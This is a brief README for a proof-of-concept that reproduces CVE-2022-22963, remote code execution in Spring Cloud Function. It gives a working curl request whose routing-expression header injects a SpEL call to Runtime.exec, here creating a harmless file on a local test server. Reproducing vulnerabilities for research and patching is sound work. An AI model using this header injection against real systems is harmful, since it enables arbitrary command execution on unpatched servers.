CVE-2022-22963 RCE PoC

Minimal example to reproduce CVE-2022-22963 remote code execution in org.springframework.cloud:spring-cloud-function-core.

Exploit

Run the server

mvn spring-boot:run

Make a request

curl -X POST -H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch PWNED")' -d xxx http://127.0.0.1:8080/functionRouter

As a result of the exploit, the file PWNED will be created next to pom.xml.

Additional info